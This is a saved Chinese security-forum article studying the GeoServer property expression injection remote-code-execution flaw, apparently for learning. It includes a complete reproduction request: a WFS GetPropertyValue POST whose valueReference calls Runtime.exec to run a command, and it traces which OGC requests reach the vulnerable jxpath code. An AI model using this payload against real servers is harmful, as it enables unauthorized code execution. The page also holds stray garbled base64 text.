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
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .x{color:#000000}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nf{color:#000000}.highlight .nl{color:#f57900}.highlight .mf{color:#0000cf;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15704?time__1311=GqjxnQiQDQQ0yRpDyDmObboi%3DqmbbD"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15704&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>GeoServer_property_expression_injection学习</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/82355>
<span class="username cell"> ooyywwll</span></a> <span class=i-seprator> / </span>
<span> 2024-09-24 20:22:07</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 73</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/1>漏洞分析</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h1 id=toc-0><strong>GeoServer_property_expression_injection</strong></h1>
<h2 id=toc-1>简单介绍</h2>
<p><a href=https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv target=_blank>https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv</a></p>
<p>GeoServer是一款开源的地理数据服务器软件主要用于发布、共享和处理各种地理空间数据。它支持众多的地图和空间数据标准能够使各种设备通过网络来浏览和使用这些地理信息数据。<br>
GeoServer2.23.6、2.24.4和2.25.2之前版本存在远程代码执行漏洞该漏洞源于Geoserver使用的第三方库GeoTool因为使用了不安全的commons-jxpath 引擎处理xpath语句导致未授权能够通过发送各类OGC请求控制了复杂的xpath表达式并注入恶意代码从而rce。</p>
<h2 id=toc-2>环境搭建</h2>
<p><a href=https://sourceforge.net/projects/geoserver/files/GeoServer/2.25.1/geoserver-2.25.1-bin.zip/download target=_blank>https://sourceforge.net/projects/geoserver/files/GeoServer/2.25.1/geoserver-2.25.1-bin.zip/download</a></p>
<p>也可以使用p神的环境直接远程调试就好了</p>
<h2 id=toc-3>漏洞复现</h2>
<p>发送post请求</p>
<div class=highlight><pre><span></span><span class=n>POST</span> <span class=o>/</span><span class=n>geoserver</span><span class=o>/</span><span class=n>wfs</span> <span class=n>HTTP</span><span class=o>/</span><span class=mf>1.1</span>
<span class=nl>Host:</span> <span class=mf>192.168.177.146</span><span class=o>:</span><span class=mi>8080</span>
<span class=n>Accept</span><span class=o>-</span><span class=n>Encoding</span><span class=o>:</span> <span class=n>gzip</span><span class=o>,</span> <span class=n>deflate</span><span class=o>,</span> <span class=n>br</span>
<span class=nl>Accept:</span> <span class=o>*/*</span>
<span class=n>Accept</span><span class=o>-</span><span class=n>Language</span><span class=o>:</span> <span class=n>en</span><span class=o>-</span><span class=n>US</span><span class=o>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.9</span><span class=o>,</span><span class=n>en</span><span class=o>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.8</span>
<span class=n>User</span><span class=o>-</span><span class=n>Agent</span><span class=o>:</span> <span class=n>Mozilla</span><span class=o>/</span><span class=mf>5.0</span> <span class=o>(</span><span class=n>Windows</span> <span class=n>NT</span> <span class=mf>10.0</span><span class=o>;</span> <span class=n>Win64</span><span class=o>;</span> <span class=n>x64</span><span class=o>)</span> <span class=n>AppleWebKit</span><span class=o>/</span><span class=mf>537.36</span> <span class=o>(</span><span class=n>KHTML</span><span class=o>,</span> <span class=n>like</span> <span class=n>Gecko</span><span class=o>)</span> <span class=n>Chrome</span><span class=o>/</span><span class=mf>124.0.6367.118</span> <span class=n>Safari</span><span class=o>/</span><span class=mf>537.36</span>
<span class=nl>Connection:</span> <span class=n>close</span>
<span class=n>Cache</span><span class=o>-</span><span class=n>Control</span><span class=o>:</span> <span class=n>max</span><span class=o>-</span><span class=n>age</span><span class=o>=</span><span class=mi>0</span>
<span class=n>Content</span><span class=o>-</span><span class=n>Type</span><span class=o>:</span> <span class=n>application</span><span class=o>/</span><span class=n>xml</span>
<span class=n>Content</span><span class=o>-</span><span class=n>Length</span><span class=o>:</span> <span class=mi>355</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span> <span class=n>service</span><span class=o>=</span><span class=err>'</span><span class=n>WFS</span><span class=err>'</span> <span class=n>version</span><span class=o>=</span><span class=err>'</span><span class=mf>2.0.0</span><span class=err>'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>topp</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.openplans.org/topp'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>fes</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/fes/2.0'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>wfs</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/wfs/2.0'&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>Query</span> <span class=n>typeNames</span><span class=o>=</span><span class=err>'</span><span class=n>sf</span><span class=o>:</span><span class=n>archsites</span><span class=err>'</span><span class=o>/&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span><span class=n>exec</span><span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>lang</span><span class=o>.</span><span class=na>Runtime</span><span class=o>.</span><span class=na>getRuntime</span><span class=o>(),</span><span class=err>'</span><span class=n>touch</span> <span class=o>/</span><span class=n>tmp</span><span class=o>/</span><span class=n>success</span><span class=err>'</span><span class=o>)&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span>
<span class=o>&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span><span class=o>&gt;</span>
</pre></div>
<p>会报错,正常的</p>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202113-7d8a89e8-7a6f-1.png><img src="data:image/png;base64,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
<h2 id=toc-4>漏洞分析</h2>
<p>我们知道漏洞的根源是在于commons-jxpath ,根据发送的公告</p>
<p>没有提供公开的 PoC但已确认可通过 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求利用此漏洞。</p>
<p>我们看看为什么是这些请求,这些请求是干嘛的</p>
<p><strong>WFS 请求</strong>GoServer 通过 WFS 实现矢量数据的查询和操作。用户可以通过 GetFeature 请求查询和下载地理特征数据,也可以使用 GetPropertyValue 仅提取感兴趣的属性信息。</p>
<p><strong>WMS 请求</strong>GoServer 使用 WMS 服务生成地图图像,并通过 GetMap 返回给用户。GetFeatureInfo 提供了一种交互方式让用户能够获取地图上特定位置的详细信息。GetLegendGraphic 则用于生成地图的图例,帮助用户理解地图内容。</p>
<p><strong>WPS 请求</strong>GoServer 可以通过 WPS Execute 提供空间数据处理服务,允许用户通过简单的网络请求执行复杂的空间分析,而无需自己编写处理逻辑或消耗本地计算资源。</p>
<p>起始在于这些请求</p>
<p>我们从WFS GetPropertyValue请求分析会经过handleRequestInternal:268, Dispatcher (org.geoserver.ows)方法调用到getPropertyValue方法</p>
<p>请求体如下</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202106-78f0b862-7a6f-1.png><img src=data:image/png;base64,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